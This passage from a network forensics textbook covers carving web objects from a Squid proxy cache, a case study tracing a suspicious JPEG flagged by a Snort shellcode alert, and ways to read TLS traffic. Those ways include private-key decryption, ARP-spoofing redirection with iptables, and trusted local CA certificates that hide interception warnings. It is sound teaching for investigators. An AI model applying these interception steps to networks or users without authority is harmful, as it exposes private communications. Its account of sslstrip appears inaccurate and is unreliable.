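For example, a recursive grep will list the cache files whose Squid metadata or HTTP headers contain a given URI. This is just a sketch; the URI and cache directory path are placeholders:

$ grep -rl 'http://www.example.com/index.html' /var/spool/squid/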

Once you have identified your cached object of interest, you can extract the original web object by removing the Squid metadata and HTTP headers prepended to the top of the file. Figure 10-5 shows an example of a page stored in the Squid disk cache, viewed using the “less” command. Notice the binary metadata at the top of the file (which includes the web object URI), followed by the original HTTP response headers received from the web server. The HTTP response headers provide us with a range of useful information about the web object and server. In particular, note the “Content-Type” header, which indicates that the cached web object is “text/html.”

image

Figure 10-5 A cached Squid object, viewed using “less.”

According to the HTTP/1.1 protocol specifications (RFC 2616) shown below,24 the HTTP message body will always be immediately preceded by TWO carriage-return/linefeeds (CRLF). In hexadecimal, a carriage return is “0x0D” and a linefeed is “0x0A.”

24. “RFC 2616—Hypertext Transfer Protocol—HTTP/1.1.”

After receiving and interpreting a request message, a server responds
with an HTTP response message.

    Response      = Status-Line               ; Section 6.1
                    *(( general-header        ; Section 4.5
                     | response-header        ; Section 6.2
                     | entity-header ) CRLF) ; Section 7.1
                    CRLF
                    [ message-body ]          ; Section 7.2

Note that the “Status-Line” in the response always ends with a CRLF, so even in the relatively rare case that there are no headers, the message body will still be immediately preceded by two CRLFs.

This means that to carve out the message body in the HTTP response, we need to look for the first instance of two CRLFs (0x0D0A0D0A). Sometimes this may include more than two CRLF sequences in a row, in which case, you will normally want to trim the entire block. Figure 10-6 shows an example of a page stored in the Squid disk cache, viewed using the Bless hex editor. To carve out the message body, cut all bytes through the “0x0D0A0D0A” marker, as shown in Figure 10-6. Notice that the CRLF characters are immediately followed by an appropriate HTML header, <!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01//EN”>, confirming that we have correctly found the beginning of the message body.

image

Figure 10-6 A cached Squid object, viewed using the Bless hex editor.
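If you prefer to script this step rather than carve by hand in a hex editor, one minimal approach (a sketch only, in the same spirit as the Perl-based extraction tool discussed later in this chapter) is to strip everything up to and including the first run of CRLF sequences:

$ perl -0777 -ne 'print $1 if /(?:\r\n){2,}(.*)/s' 00/00/000000F8 > 000000F8-body
$ file 000000F8-body

Here the one-liner reads the entire cache file as a single record, matches the first run of two or more consecutive CRLFs, and writes out only what follows, which should be the HTTP message body.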

Once the HTTP response message body is carved out, we can analyze the web object using native viewers, as we would for usual filesystem forensics. Figure 10-7 shows an example of the extracted web object, viewed using “less.” In the source, there is a referral to the image file lolcatsdotcomvz4o71odbkla2v24.jpg. We’ll come back to that.

image

Figure 10-7 An extracted text/html web object, viewed using “less”.

Opening the extracted text/html web object in a browser (offline), we see some of the page content (shown in Figure 10-8). Notice that since the browser is not connected to the Internet, it does not automatically retrieve referenced images and the embedded links will not work.

image

Figure 10-8 An extracted web object, viewed using the Firefox web browser (offline).

It is possible for us to search the Squid cache and retrieve any referenced images, which are also stored on disk. Let’s see if that image file, lolcatsdotcomvz4o71odbkla2v24.jpg, is in our disk cache. For this example, we simply search for the referenced URL using Linux command-line tools:

$ grep -r 'http://lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg' squid/
Binary file squid/00/00/000000F8 matches

Now let’s examine the metadata strings and HTTP header information from the matching cache file.

$ strings 00/00/000000F8 |head
http://lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg
HTTP/1.1 200 OK
Date: Tue, 14 Apr 2009 19:56:20 GMT
Server: Apache/2.2.3 (FH)
Last-Modified: Mon, 26 May 2008 11:27:13 GMT
ETag: "bd50e3-bf60-76080640"
Accept-Ranges: bytes
Content-Length: 48992
Connection: close
Content-Type: image/jpeg

From the URI and Content-Type header, this appears to be the image we’re looking for.

To extract the cached JPEG, open a hex editor and cut the Squid metadata and HTTP headers out of the file. Figure 10-9 shows the cached JPEG stored in the Squid disk cache, viewed using the Bless hex editor. Once again, to carve out the message body, cut all bytes through the “0x0D0A0D0A” marker, as shown in Figure 10-9. Notice that the characters immediately following this marker are “0xFFD8.” This corresponds with the “magic number” for JPEG images, and is good corroborating evidence that we have correctly carved out the JPEG image referred to in the URI and Content-Type header.

image

Figure 10-9 A JPEG image in the Squid disk cache, viewed using the Bless hex editor.

To confirm the file type, we can use the Linux “file” command:

$ file 000000F8-edited.jpg
000000F8-edited.jpg: JPEG image data, JFIF standard 1.01, comment: "CREATOR:
    gd-jpeg v1.0 (using IJ"

Finally, we can open the file up in an image viewer, as shown in Figure 10-10. Voila!

image

Figure 10-10 The JPEG image extracted from the Squid disk cache.

As good forensic practice, it is always wise to obtain the cryptographic hash from any files you carve:

$ sha256sum 000000F8-edited
418e52142768243b83a174d3ef9587fb55ebe4b06c61f461e6097563526f651a  000000F8-
    edited

$ md5sum 000000F8-edited
e8db83aac64fec5ceb6ee7d135f13e10  000000F8-edited

10.5.2.2 Automated Squid Cache Extraction

We are at the forefront of an industry. Very little has been written or developed so far to assist with extracting web objects directly from web proxy caches.

Happily, the network forensic community has been stepping up. Alan Tu, George Bakos, and Rick Smith have all contributed to development of a Squid cache extraction tool, “squid_extract_v01.pl,”25 which can automatically extract the web object from a Squid cache file, or even extract all web objects from an entire Squid cache directory, as shown below:

25. A. Tu, G. Bakos, and R. Smith, “squid_extract_v01.pl,” https://forensicscontest.com/tools/squid_extract_v01.pl.

$ squid_extract_v01.pl -p squid -o extracted/

Here are the contents of the directory where squid_extract_v01.pl placed the extracted files, organized by domain:

$ ls extracted/
0.gravatar.com                      news.slashdot.org
1.gravatar.com                      pagead2.googlesyndication.com
ad.doubleclick.net                  partner.googleadservices.com
ads1.msn.com                        partners.dogtime.com
ak.imgfarm.com                      pix01.revsci.net
analytics.live.com                  pubads.g.doubleclick.net
api.search.live.com                 rmd.atdmt.com
ask.slashdot.org                    s2.wordpress.com
b.ads1.msn.com                      s3.wordpress.com
b.casalemedia.com                   s7.addthis.com
bin.clearspring.com                 s9.addthis.com
cache.amefin.com                    sansforensics.files.wordpress.com
cdn.doubleverify.com                sansforensics.wordpress.com
clients1.google.com                 search.msn.com
davidoffsecurity.com                s.fsdn.com
ds.serving-sys.com                  shots.snap.com
ec.atdmt.com                        slashdot.org
en-us.fxfeeds.mozilla.com           spa.snap.com
en.wikipedia.org                    spe.atdmt.com
extract_log.txt                     s.stats.wordpress.com
faq.files.wordpress.com             start.ubuntu.com
finickypenguin.files.wordpress.com  stats.wordpress.com
finickypenguin.wordpress.com        st.msn.com
forensics.sans.org                  suggestqueries.google.com
fpdownload2.macromedia.com          s.wordpress.com
fxfeeds.mozilla.com                 tbn2.google.com
googleads.g.doubleclick.net         tk2.stb.s-msn.com
i.ixnp.com                          tk2.stc.s-msn.com
images-origin.thinkgeek.com         tk2.stj.s-msn.com
images.slashdot.org                 upload.wikimedia.org
images.sourceforge.net              urgentq.foxnews.com
images.thinkgeek.com                video.google.com
img.youtube.com                     vign_foxnews-news.baynote.net
jhamcorp.com                        www.controlscan.com
js.adsonar.com                      www.feedburner.com
js.casalemedia.com                  www.foxbusiness.idmanagedsolutions.com
js.revsci.net                       www.foxnews.com
linux.slashdot.org                  www.google-analytics.com
lolcats.com                         www.google.com
m1.2mdn.net                         www.gravatar.com
medals.bizrate.com                  www.msn.com
media2.foxnews.com                  www.thinkgeek.com
meta.wikimedia.org                  www.wikipedia.org
msntest.serving-sys.com             yui.yahooapis.com
newsrss.bbc.co.uk

In the output directory there is also a logfile, which by default lists the original cache file and the corresponding URI:

$ head extracted/extract_log.txt
working file: squid/00/00/00000001
Extracting http://www.msn.com/

working file: squid/00/00/00000002
Extracting http://tk2.stc.s-msn.com/br/hp/11/en-us/css/b_7_s.css

working file: squid/00/00/00000003
Extracting http://ads1.msn.com/library/dap.js

working file: squid/00/00/00000004

Let’s check to see if the automated squid_extract_v01.pl tool correctly carved out the JPEG image file we manually extracted earlier. First, we will check the file’s magic number:

$ file extracted/lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg
extracted/lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg: JPEG
    image data, JFIF standard 1.01, comment: "CREATOR: gd-jpeg v1.0 (using IJ"

Next, let’s take the cryptographic checksums:

$ sha256sum extracted/lolcats.com/images/u/08/22/
    lolcatsdotcomvz4o71odbkla2v24.jpg
418e52142768243b83a174d3ef9587fb55ebe4b06c61f461e6097563526f651a  extracted/
    lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg

$ md5sum extracted/lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.
    jpg
e8db83aac64fec5ceb6ee7d135f13e10  extracted/lolcats.com/images/u/08/22/
    lolcatsdotcomvz4o71odbkla2v24.jpg

Notice that the cryptographic hashes we obtained from carving automatically using squid_extract_v01.pl match the ones we obtained earlier when we extracted the corresponding web objects manually.

10.6 Encrypted Web Traffic

Encryption of files at rest is a well-known problem in traditional hard drive forensics. Forensic investigators are often called upon to analyze hard drives or files that are partially or fully encrypted. For an investigator, dealing with encryption can be one of the most difficult challenges. Much has been written about how to deal with this issue when encryption is used at rest, from memory analysis techniques for recovering passwords and full-volume encryption keys, to the sophisticated techniques described in XKCD (Figure 10-11).

image

Figure 10-11 An “XKCD” cartoon describing advanced techniques for recovering encrypted data. By Randall Munroe, xkcd.com.26

26. Randall Munroe, “xkcd: Security,” 2011, http://xkcd.com/538/.

Encryption on the wire poses the same types of challenges for network forensic investigators. In particular, an increasing percentage of web traffic is encrypted, using TLS/SSL or other means. This can make it difficult for enterprises to routinely filter inbound and outbound content, scan downloads for malware, ensure that appropriate use policies are followed, check uploads for proprietary information, and more.

There are several contributing factors that have led to the rise in encrypted web transactions:

• Industry regulations such as PCI, as well as government regulations such as HIPAA, require that sensitive information be protected by encryption in transit. Since the web is a very convenient medium for conducting financial transactions and exchanging personal, financial, and even medical information, easy-to-use encryption schemes are becoming widespread.

• Employees seeking to browse privately, as well as insider attackers on company networks, may leverage encryption to disguise their web activity.

• Malware authors and distributors often use encryption to disguise their payloads and/or subsequent communications channels.

As you can see, encryption is a tool. Like any tool, it can be used to protect legitimate personal and business interests, or it can be misused to help circumvent organizational policies and undermine fair business practices.

Network forensic investigators may be called upon:

• To identify encrypted web traffic, examine the endpoints, volume, and flow data, and determine the associated risk to the organization and likelihood of legitimate/illegitimate use.

• To evaluate the effectiveness of a web traffic encryption scheme.

• To circumvent or break an encryption scheme and gain access to content that one or both endpoints of communication intended to be confidential.

10.6.1 Transport Layer Security (TLS)

The Transport Layer Security (TLS) protocol is an IETF standard designed to “provide communications security over the Internet.”27 Its predecessor, the Secure Sockets Layer (SSL) protocol, was originally developed by Netscape Communications during the mid-1990s. In 1999, the IETF published TLS 1.0, which was designed to improve upon SSL.28 Since then, the development and adoption of TLS has continued and become widespread, particularly to provide security for web applications.29 Although Netscape patented the SSL protocol, it has granted the public a royalty-free license to use SSL and TLS, which is based on it.

27. T. Dierks and E. Rescorla, “RFC 5246—The Transport Layer Security (TLS) Protocol Version 1.2,” IETF, August 2008, http://rfc-editor.org/rfc/rfc5246.txt.

28. T. Dierks and C. Allen, “RFC 2246—The TLS Protocol Version 1.0,” IETF, January 1999, http://rfceditor.org/rfc/rfc2246.txt.

29. T. Dierks and E. Rescorla, “RFC 5246—The Transport Layer Security (TLS) Protocol Version 1.2,” IETF, August 2008, http://rfc-editor.org/rfc/rfc5246.txt.

Despite its name, TLS is not a transport-layer protocol. Rather, it is designed to be layered on top of a transport-layer protocol such as TCP in order to provide cryptographic security for higher-layer applications.

In web applications, TLS is commonly used for two purposes:

• To provide confidentiality and integrity of data in transit between the web client and web server.

• To provide a means by which web clients can verify the identity of the web server with which they are communicating (and vice versa, although more rarely).

10.6.1.1 How TLS/SSL Works

TLS is the world’s most common framework for implementation of public-key cryptography. All modern browsers are distributed with built-in certificates for trusted certificate authorities (CAs) such as Verisign (see Figure 10-12). Web servers present their digitally signed certificates to web clients, which in turn use certificates from trusted CAs to verify the identity of the web server.

image

Figure 10-12 A screenshot of part of a Certificate Authority’s certificate, “VeriSign Class 3 Public Primary Certification Authority—G5.” This certificate is distributed with many modern browsers (in this case, Opera).

According to the X.509 specification,30 “the CA certifies the binding between the public key material and the subject of the certificate.” Each certificate includes information such as the certificate subject, issuer, dates of validity, the issuer’s public key, and the cryptographic algorithms used. A certificate authority verifies the accuracy of the information in the certificate, and then uses its own private key to compute a digital signature of the information contained in the certificate. This digital signature is distributed as part of the certificate itself to allow for later verification.

30. D. Cooper, “RFC 5280—Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile,” IETF, May 2008, http://www.rfc-editor.org/rfc/rfc5280.txt.

To implement the TLS protocol, each web server has a public key and a private key. When a client contacts the server:

• The client and server agree on the protocol version and algorithms to be used.

• The server sends the client a certificate that includes its public key and information about the server (including its canonical name). A digital signature is attached to the certificate. The purpose of the digital signature is to enable the client to cryptographically verify the validity of the information in the certificate itself, including the server’s public key.

• The client optionally provides its certificate to the server for client authentication.

• The client computes a cryptographic hash of the information in the web server’s certificate. It then uses the public key of the appropriate certificate authority to verify that the certificate’s digital signature matches this hash.

• The client checks that the certificate is currently valid and that the host name listed in the certificate matches the web server’s host name.

• The client uses the web server’s public key to encrypt a random secret number, known as the “premaster secret,” and sends it to the web server. The web server uses its private key to decrypt the message and retrieve the premaster secret, which is now shared only by the client and server. The shared premaster secret is used as the basis to generate session keys for subsequent symmetric key encryption of communications.31

31. Jeff Moser, “Moserware: The First Few Milliseconds of an HTTPS Connection,” June 10, 2009, http://www.moserware.com/2009/06/first-few-milliseconds-of-https.html.
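
You can watch this handshake occur in real time using OpenSSL’s built-in test client; the “-state” option prints each state transition as the handshake proceeds (again, www.example.com is only a placeholder):

$ openssl s_client -connect www.example.com:443 -state </dev/null   # placeholder host

The state transitions printed correspond to the hello, certificate, and key exchange messages described above, followed by the switch to encrypted application data.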

10.6.2 Gaining Access to Encrypted Content

If you need to gain access to the content of web application communications encrypted with TLS/SSL (and you have the legal authority to do so), there are two general approaches. First, in some cases you can capture traffic and use the server’s private key to recover the session keys and decrypt the contents (depending on the method of key exchange). This requires that you have access to the server’s private key either before or after the traffic capture.

Second, you can intercept the TLS/SSL session using a proxy. If you have control of the client, you can install your own certificate authority’s certificate and configure the system to trust certificates presented by your proxy. Otherwise, the user of the client system may receive a warning about a potential man-in-the-middle attack.

10.6.2.1 Server’s Private Key

If you have the web server’s private key, and a TLS/SSL traffic capture in which the RSA algorithm was used for session key exchange, you can decrypt the premaster secret sent by the client and recover the session keys used as the basis for subsequent symmetric key encryption. You will need a full-content packet capture of the TLS/SSL handshake and subsequent traffic between the client and server. It is not necessary to have access to the server’s private key before obtaining the packet capture; you can capture traffic and later recover the server’s private key to use for decryption.

Be aware that this technique will work for TLS/SSL sessions that rely on RSA for key exchange, but not for sessions that use Diffie-Hellman key exchange. As noted by security researcher Erik Hjelmvik,32

32. Erik Hjelmvik, “Facebook, SSL and Network Forensics,” January 2011, http://www.netresec.com/?page=Blog&month=2011-01&post=Facebook-SSL-and-Network-Forensics.

“There are multiple ways to perform the key exchange in SSL, but the most common ways are to either use RSA or to use ephemeral Diffie-Hellman key exchange. When RSA is used, and a passive listener is in possession of the server’s private RSA key, one can actually decode the SSL traffic. Diffie-Hellman key exchange does, on the other hand, use a scheme where a new random private key is generated for each individual session. This prevents a third-party listener, who did not participate in the key exchange, from decoding the SSL session.”

Wireshark

Wireshark can be compiled with functionality for decrypting TLS/SSL-encrypted traffic when RSA key exchange is used and the server’s private key is known.33 In Figure 10-13, you can see an SSL-encrypted packet capture, shown in Wireshark. Note that the protocol in the Packet List window is listed as “SSLv3,” that the Packet Details window describes the contents as “Encrypted Application Data,” and that no higher-layer protocol details are listed below this.

33. “SSL—The Wireshark Wiki,” June 24, 2011, http://wiki.wireshark.org/SSL.

image

Figure 10-13 A packet capture of SSL-encrypted traffic, shown in Wireshark.

Figure 10-14 shows an example of Wireshark’s SSL protocol configuration window, which allows the user to provide Wireshark with a path to the server’s private key. Once the private key has been incorporated, Wireshark will automatically decrypt SSL/TLS-encrypted content. Figure 10-15 shows the same packet capture as above, after the server’s private key has been used to recover the premaster secret and compute the session keys. Notice that Wireshark now lists the protocol as “HTTP,” and that the Packet Details panel presents “Reassembled SSL Segments” along with HTTP header information.

image

Figure 10-14 Wireshark’s SSL protocol configuration window, which allows the end-user to incorporate the SSL server’s private key.

image

Figure 10-15 A packet capture of SSL-encrypted traffic, shown in Wireshark. In this case, Wireshark has been configured to use the web server’s private key to decrypt the SSL-encrypted packet contents. Notice that the application-layer HTTP data has been recovered.
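
If you prefer to script this analysis, Wireshark’s command-line counterpart, tshark, can typically be supplied with the same private key through the ssl.keys_list preference. The following is a sketch only; it assumes a tshark build with SSL decryption support, and the server IP address, port, and key path shown are placeholders:

$ tshark -r ssl-capture.pcap -V \
    -o "ssl.keys_list:192.168.1.50,443,http,/path/to/server.key"   # all values are placeholders

As in the GUI, decryption will only succeed for sessions that used RSA key exchange.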

10.6.2.2 Intercepting Proxy

You can capture and inspect the contents of TLS/SSL-encrypted traffic by using a TLS/SSL proxy to intercept the traffic. To accomplish this, you first need to set up a proxy through which the client and server communications are sent. When the client sends a request to a TLS/SSL server, the server’s TLS/SSL responses are terminated at the proxy, and the proxy sets up an encrypted tunnel between the proxy and server. The proxy also provides a “spoofed” server certificate to the client and sets up a second TLS/SSL tunnel between the client and proxy. The proxy itself can then inspect the traffic in cleartext, or forward it along to another system for analysis.

Of course, the challenge is that TLS/SSL is designed to protect against this very situation: essentially, a man-in-the-middle attack against the TLS/SSL protocol. In theory, the web client should detect that the proxy’s certificate is spoofed, because it is not properly signed by a trusted CA, and present the user with a warning pop-up or similar alert. In practice, forensic investigators and authorized network personnel can prevent these warnings. When you have control over the configuration of the client, as is the case in many enterprises, you can install a locally generated, trusted CA certificate in each client’s browser. The corresponding CA key can then be used to digitally sign even the “spoofed” certificates provided by the intercepting proxy, which the client will then treat as valid. (It is also a sad state of affairs that many end users will simply ignore security warnings and click through them, sacrificing privacy and security for convenience.)
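
As a rough sketch of how such a local signing certificate might be created, the OpenSSL commands below generate a private key and a self-signed CA certificate. The file names and subject name are arbitrary; the resulting certificate would be imported into each client’s trusted root store, and the key provided to the intercepting proxy for signing its emulated certificates.

$ openssl genrsa -out interceptCA.key 2048                        # file names are arbitrary
$ openssl req -new -x509 -key interceptCA.key -out interceptCA.crt \
    -days 365 -subj "/CN=Example Intercepting Proxy CA"           # example subject name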

Sslstrip

“Sslstrip” is a free, publicly available TLS/SSL interception tool by Moxie Marlinspike, distributed under the GNU GPLv3.34 Sslstrip is designed to work in conjunction with ARP spoofing or a similar method that causes selected traffic to be routed through a host under your control. (If you control the routers or firewall, you can simply have that traffic legitimately forwarded to your host, with less risk.) Remember to set up IP forwarding on your host so that the traffic is passed along to its final destination, as sketched below.

34. Moxie Marlinspike, “sslstrip,” 2011, http://www.thoughtcrime.org/software/sslstrip.
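
The exact redirection mechanism depends on your environment, but on a Linux host the plumbing generally looks something like the following sketch (run with root privileges); here, 8443 is simply a placeholder for whatever local port the interception tool is configured to listen on:

$ sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'   # forward intercepted traffic onward
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 8443   # 8443 = placeholder listener port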

Once sslstrip receives a TLS/SSL client connection, it can:

• Connect to the real TLS/SSL site and capture the certificate information

• Generate a new certificate on the fly with an identical Distinguished Name

• Sign the new certificate with a certificate/key you have provided

• Do a TLS/SSL handshake with the client

From that point on, the traffic is TLS/SSL-encrypted both between the client and sslstrip and between sslstrip and the web server. Sslstrip itself can capture the traffic in cleartext and log it.

The only caveat is that unless the client’s system trusts the interceptor’s certificate, the client will receive a pop-up indicating that the web server’s SSL certificate is not trusted.

10.6.3 Commercial TLS/SSL Interception Tools

Commercial web proxies, such as those manufactured by Blue Coat and others, can proxy not only the web traffic but also session-layer TLS/SSL traffic used in HTTPS sessions. This allows for content inspection of what would otherwise be encrypted payloads.

As an example, Blue Coat’s ProxySG includes SSL interception and content filtering features. Blue Coat’s products are based on essentially the same principles as sslstrip. Blue Coat intercepts and inspects SSL content by terminating the server’s SSL tunnel at the proxy, providing a “spoofed” certificate to the client, and setting up a second SSL tunnel between the client and proxy.

To prevent client security pop-ups, the Blue Coat Systems Deployment Guide, “Deploying the SSL Proxy,” includes the following suggestion: “When the SSL Proxy intercepts an SSL connection, it presents an emulated server certificate to the client browser. The client browser issues a security pop-up to the end-user because the browser does not trust the issuer used by the ProxySG. This pop-up does not occur if the issuer certificate used by SSL Proxy is imported as a trusted root in the client browser’s certificate store. The ProxySG makes all configured certificates available for download via its management console. You can ask end users to download the issuer certificate through Internet Explorer or Firefox and install it as a trusted CA in their browser of choice. This eliminates the certificate popup for emulated certificates ...”35, 36, 37, 38

35. “Think Your SSL Traffic is Secure?,” July 3, 2006, http://directorblue.blogspot.com/2006/07/think-your-ssl-traffic-is-secure-if.html.

36. “Deploying the SSL Proxy,” Blue Coat Systems Inc., 2006, http://www.bluecoat.co.jp/downloads/manuals/SGOS_DG_4.2.x.pdf.

37. Joris Evers, “Blue Coat to Cleanse Encrypted Traffic,” CNET News, November 8, 2005, http://news.cnet.com/Blue-Coat-to-cleanse-encrypted-traffic/2100-1029_3-5940533.html.

38. “Webwasher Competitive Sheet: Web Security,” Secure Computing, n.d., http://dr0.bluesky.com.au/Vendors/Secure_Computing/Web_Gateway/WebWasher/Comparisons/WebwasherCompSheet-BlueCoat.pdf.

10.7 Conclusion

In 1989, Tim Berners-Lee proposed creating a “global hypertext system” of “[h]uman-readable information linked together in an unconstrained way.”39 Since then, the World Wide Web has exploded to incorporate graphics, multimedia, interactive chat, and social networking, and pervaded nearly every aspect of modern life.

39. Tim Berners-Lee, “Information Management: A Proposal,” May 1990, http://www.w3.org/History/1989/proposal.html.

Web proxies are traditionally used inside organizations to improve performance and filter traffic. Now, we are witnessing the next evolution, in which customized, dynamic content is delivered quickly through a network of distributed caching web proxies. As their functionality increases, web proxies have become invisibly ingrained into the fabric of the World Wide Web, and into network forensic investigations as well.

In this chapter, we discussed the various types of evidence that may exist on web proxies, reviewed tools for analyzing web access logs, and demonstrated how to carve a web object out of a Squid web proxy cache. When there is an investigation involving web activity, forensic investigators should keep in mind that client web access logs and cached web objects may exist. This evidence can provide an invaluable glimpse of precisely what the client requested and when, and can even reveal the exact web object that the user received in response.

10.8 Case Study: InterOptic Saves the Planet (Part 2 of 2)


The Case: In his quest to save the planet, InterOptic has started a credit card number recycling program. “Do you have a database filled with credit card numbers, just sitting there collecting dust? Put that data to good use!” he writes on his web site. “Recycle your company’s used credit card numbers! Send us your database, and we’ll send YOU a check.”

For good measure, InterOptic decides to add some bells and whistles to the site, too ...

Meanwhile ... MacDaddy Payment Processor deployed Snort NIDS sensors to detect an array of anomalous events, both inbound and outbound. An alert was logged at 08:01:45 on 5/18/11 concerning an inbound chunk of executable code sent from port 80/tcp on external host 172.16.16.218 to inside host 192.168.1.169. Here is the alert:

[**] [1:10000648:2] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
05/18-08:01:45.591840 172.16.16.218:80 -> 192.168.1.169:2493
TCP TTL:63 TOS:0x0 ID:53309 IpLen:20 DgmLen:1127 DF
***AP*** Seq: 0x1B2C3517  Ack: 0x9F9E0666  Win: 0x1920  TcpLen: 20

We analyzed the Snort alert and determined the following likely events (see the case study in Chapter 7 for more details):

• From at least 07:45:09 MST until at least 08:15:08 MST on 5/18/11, internal host 192.168.1.169 was being used to browse external web sites, some of which delivered web bugs, which were detected and logged.

• At 08:01:45 MST, an external web server 172.16.16.218:80 delivered what it stated was a JPEG image to 192.168.1.169, which contained an unusual binary sequence that is commonly associated with buffer overflow exploits.

• The ETag in the external web server’s HTTP response was:

1238-27b-4a38236f5d880

• The MD5sum of the suspicious JPEG was:

13c303f746a0e8826b749fce56a5c126

• Less than three minutes later, at 08:04:28 MST, internal host 192.168.1.169 spent roughly 10 seconds sending crafted packets to other internal hosts on the 192.168.1.0/24 network. Based on their nonstandard nature, the packets are consistent with those used to conduct reconnaissance via scanning and operating system fingerprinting.

Challenge: You are the forensic investigator. Your mission is to:

• Examine the Squid cache and extract any cached pages/files associated with the Snort alert shown above.

• Determine whether the evidence extracted from the Squid cache corroborates our findings from the Snort logs.

• Based on web proxy access logs, gather information about the client system 192.168.1.169, including its likely operating system and the apparent interests of any users.

• Present any information you can find regarding the identity of any internal users who have been engaged in suspicious activities.

Network: The MacDaddy Payment Processor network consists of three segments:

• Internal network: 192.168.1.0/24

• DMZ: 10.1.1.0/24

• The “Internet”: 172.16.0.0/12 [Note that for the purposes of this case study, we are treating the 172.16.0.0/12 subnet as “the Internet.” In real life, this is a reserved nonroutable IP address space.]

Other domains and subnets of interest include:

• .evl—a top-level domain (TLD) used by Evil systems.

• example.com—MacDaddy Payment Processor’s local domain. [Note that for the purposes of this case study, we are treating “example.com” as a legitimate second-level domain. In real life, this is a reserved domain typically used for examples, as per RFC 2606.]

Evidence: You are provided with two files containing data to analyze:

evidence-squid-cache.zip—A zipfile containing the Squid cache directory (“squid”) from the local web proxy, www-proxy.example.com. Helpfully, security staff inform you that since MacDaddy Payment Processor’s network connection has been slow, the web proxy is tuned to retain a lot of pages in the local cache.

evidence-squid-logfiles.zip—Snippets of the “access.log” and “store.log” files from the local Squid web proxy, www-proxy.example.com. The access.log file contains web browsing history logs, and the store.log file contains cache storage records, both from the same time period as the NIDS alert.


10.8.1 Analysis: pwny.jpg

Let’s begin by examining the Squid proxy cache for traces of the suspicious image that we found in Snort. The HTTP response headers that we carved from the Snort packet capture contained a pseudo-unique ETag value of “1238-27b-4a38236f5d880.” Using Linux command-line tools, we can search the Squid cache and list the cache file that contains this ETag, as shown below:

$ grep -r '1238-27b-4a38236f5d880' squid
Binary file squid/00/05/0000058A matches

It appears that the page we’re looking for is cached in the file “squid/00/05/0000058A.” Opening the cached page in “Bless,” we can find the URI of the requested cached object in the Squid metadata, as shown in Figure 10-16. It appears that the URI of the cached object was:

image

Figure 10-16 Opening the cached page in “Bless,” we can find the URI of the requested cached object in the Squid metadata.

http://www.evil.evl/pwny.jpg

Immediately following the metadata are the HTTP headers, as follows:

HTTP/1.1 200 OK
Date: Wed, 18 May 2011 15:01:45 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.5 with Suhosin-Patch
Last-Modified: Wed, 18 May 2011 00:46:10 GMT
ETag: "1238-27b-4a38236f5d880"
Accept-Ranges: bytes
Content-Length: 635
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

These precisely match the HTTP headers within the packet we carved earlier from the Snort tcpdump.log file, as shown in Chapter 7. From these HTTP headers, we can deduce that this Squid cache file likely contains a JPEG image 635 bytes in length.

JPEG files begin with the magic number “0xFFD8,” so we can simply search the Squid cache file for that hex sequence and cut everything before it, as you can see in Figure 10-17. We save this edited cache file as “0000058A-edited.jpg.”

image

Figure 10-17 JPEG files begin with the magic number “0xFFD8,” so we can simply search the Squid cache file for that hex sequence, using Bless, and cut everything before it.
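
If you would rather carve the image from the command line than with a hex editor, the same result can be produced with standard GNU tools. This is only a sketch; it locates the byte offset of the first 0xFFD8 marker and writes everything from that offset onward to a new file (named “0000058A-carved.jpg” here to distinguish it from the hex-editor version):

$ offset=$(LC_ALL=C grep -obaP '\xff\xd8' squid/00/05/0000058A | head -1 | cut -d: -f1)   # offset of first 0xFFD8
$ tail -c +$((offset + 1)) squid/00/05/0000058A > 0000058A-carved.jpg   # carve from that offset to end of file

The carved file should have the same size and checksums as the version produced with Bless.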

Let’s check the size of this file and see if it matches the expected 635 bytes:

$ ls -l 0000058A-edited.jpg
-rwx------ 1 student student 635 2011-06-16 00:06 0000058A-edited.jpg

It does! Let’s also check the file type:

$ file 0000058A-edited.jpg
0000058A-edited.jpg: JPEG image data

The “file” command corroborates that the file we carved is a JPEG image. Let’s also take the cryptographic checksums:

$ md5sum 0000058A-edited.jpg
13c303f746a0e8826b749fce56a5c126  0000058A-edited.jpg

$ sha256sum 0000058A-edited.jpg
fc5d6f18c3ed01d2aacd64aaf1b51a539ff95c3eb6b8d2767387a67bc5fe8699  0000058A-
    edited.jpg

This is great! The MD5 and SHA256 checksums for this file, which we carved out of the local Squid cache, precisely match the checksums for the file we carved out earlier from the Snort packet capture (see Chapter 7). We were able to extract the same image from two different sources of evidence. This strengthens our case.

10.8.2 Squid Cache Page Extraction

Now, let’s see if we can find any pages that linked to the image at http://www.evil.evl/pwny.jpg. This may help us track down the activities that led to its download.

$ grep -r 'http://www.evil.evl/pwny.jpg' squid
Binary file squid/00/05/00000589 matches
Binary file squid/00/05/0000058A matches

We’ve already examined “squid/00/05/0000058A”—that’s the file that contains our actual image, pwny.jpg. Let’s take a look at the other file, “squid/00/05/00000589.” Figure 10-18 shows this file opened in the Bless hex editor. The source URI, stored in the Squid metadata at the top of the cache file, is highlighted. It is “http://sketchy.evl/?p=3.”

image

Figure 10-18 Squid cache file 00000589 opened in Bless. The source URI, stored in the Squid metadata, is highlighted.

Here are the HTTP headers from Squid cache file squid/00/05/00000589, as copied from the Bless ASCII representation:

HTTP/1.0 200 OK
Date: Wed, 18 May 2011 15:01:29 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.5
X-Pingback: http://sketchy.evl/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8

